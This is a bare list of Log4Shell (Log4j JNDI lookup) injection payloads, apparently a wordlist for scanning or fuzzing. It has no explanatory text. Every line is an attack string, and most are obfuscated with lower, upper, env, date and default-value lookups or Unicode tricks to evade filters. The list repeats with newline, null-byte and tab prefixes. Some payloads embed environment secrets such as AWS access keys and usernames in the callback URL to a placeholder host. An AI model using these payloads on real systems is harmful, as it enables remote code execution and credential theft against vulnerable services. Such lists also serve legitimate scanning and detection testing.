${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://url/poc}
${${::-j}ndi:rmi://url/ass}
${jndi:ldap://url/poc}
${jndi:rmi://url}
${${::-${::-$${::-j}}}}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://url/z}
${jnd${sys:SYS_NAME:-i}:ldap:/url/z}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://url/z}
${jnd${upper:ı}:ldap://url/z}
${\u006a\u006e\u0064\u0069:ldap://url/z}
${jndi:ldap://127.0.0.1#url/z}
${${lower:jndi}:${lower:rmi}://url/poc}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://url/z}
${${lower:${lower:jndi}}:${lower:rmi}://url/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://url/poc}
${${lower:j}${upper:teln}${lower:d}${upper:i}:${lower:r}m${lower:i}}://url/poc}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//url/z}
${jndi:ldap://url/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://url/z}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://url/z}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://url/z}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://url/a}
${${lower:jndi}:${lower:rmi}://url/poc}
${j${loWer:Nd}i${uPper::}://url/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//url/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//url/a}
${jndi:ldap://${env:USER}.${env:USERNAME}.url:1389/
${jndi:ldap://${env:USER}.${env:USERNAME}.url/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
${${::-j}${::-n}${::-d}${::-I}:${::-l}${::-d}${::-a}${::-p}://url/poc1}
${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}://url/poc5}
${${::-j}ndi:rmi://url/poc14}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://url/poc2}
${${lower:${lower:jndi}}:${lower:rmi}://url/poc7}
${${lower:jndi}:${lower:rmi}://url/poc6}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://url/poc9}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://url/poc16}
${${lower:n}${lower:d}i:${lower:rmi}://url/poc8}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://url/poc3}
${j${123123123:-n}di${123123123:-:}ldap:${123123123:-//}url/poc12}
${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://url/poc15}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://url/poc11}
${jnd${sys:UNIX:-i}:ldap:/url/poc17}
${jnd${upper:ı}:ldap://url/poc18}
${jndi${123%25ff:-}:ldap://url/poc10}
${jndi:ldap://url/poc4}
${jndi:ldap://127.0.0.1#{\{url}}/{poc13}}
${jndi:rmi://url}
%%0a${${::-j}${::-n}${::-d}${::-I}:${::-l}${::-d}${::-a}${::-p}://url/poc1}
%%0a${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}://url/poc5}
%%0a${${::-j}ndi:rmi://url/poc14}
%%0a${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://url/poc2}
%%0a${${lower:${lower:jndi}}:${lower:rmi}://url/poc7}
%%0a${${lower:jndi}:${lower:rmi}://url/poc6}
%%0a${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://url/poc9}
%%0a${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://url/poc16}
%%0a${${lower:n}${lower:d}i:${lower:rmi}://url/poc8}
%%0a${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://url/poc3}
%%0a${j${123123123:-n}di${123123123:-:}ldap:${123123123:-//}url/poc12}
%%0a${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://url/poc15}
%%0a${jnd${123%25ff:-${123%25ff:-i:}}ldap://url/poc11}
%%0a${jnd${sys:UNIX:-i}:ldap:/url/poc17}
%%0a${jnd${upper:ı}:ldap://url/poc18}
%%0a${jndi${123%25ff:-}:ldap://url/poc10}
%%0a${jndi:ldap://url/poc4}
%%0a${jndi:ldap://127.0.0.1#{\{url}}/{poc13}}
%%0a${jndi:rmi://url}
%%00${${::-j}${::-n}${::-d}${::-I}:${::-l}${::-d}${::-a}${::-p}://url/poc1}
%%00${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}://url/poc5}
%%00${${::-j}ndi:rmi://url/poc14}
%%00${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://url/poc2}
%%00${${lower:${lower:jndi}}:${lower:rmi}://url/poc7}
%%00${${lower:jndi}:${lower:rmi}://url/poc6}
%%00${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://url/poc9}
%%00${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://url/poc16}
%%00${${lower:n}${lower:d}i:${lower:rmi}://url/poc8}
%%00${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://url/poc3}
%%00${j${123123123:-n}di${123123123:-:}ldap:${123123123:-//}url/poc12}
%%00${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://url/poc15}
%%00${jnd${123%25ff:-${123%25ff:-i:}}ldap://url/poc11}
%%00${jnd${sys:UNIX:-i}:ldap:/url/poc17}
%%00${jnd${upper:ı}:ldap://url/poc18}
%%00${jndi${123%25ff:-}:ldap://url/poc10}
%%00${jndi:ldap://url/poc4}
%%00${jndi:ldap://127.0.0.1#{\{url}}/{poc13}}
%%00${jndi:rmi://url}
%%09${${::-j}${::-n}${::-d}${::-I}:${::-l}${::-d}${::-a}${::-p}://url/poc1}
%%09${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}://url/poc5}
%%09${${::-j}ndi:rmi://url/poc14}
%%09${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://url/poc2}
%%09${${lower:${lower:jndi}}:${lower:rmi}://url/poc7}
%%09${${lower:jndi}:${lower:rmi}://url/poc6}
%%09${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://url/poc9}
%%09${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://url/poc16}
%%09${${lower:n}${lower:d}i:${lower:rmi}://url/poc8}
%%09${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://url/poc3}
%%09${j${123123123:-n}di${123123123:-:}ldap:${123123123:-//}url/poc12}
%%09${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://url/poc15}
%%09${jnd${123%25ff:-${123%25ff:-i:}}ldap://url/poc11}
%%09${jnd${sys:UNIX:-i}:ldap:/url/poc17}
%%09${jnd${upper:ı}:ldap://url/poc18}
%%09${jndi${123%25ff:-}:ldap://url/poc10}
%%09${jndi:ldap://url/poc4}
%%09${jndi:ldap://127.0.0.1#{\{url}}/{poc13}}
%%09${jndi:rmi://url}
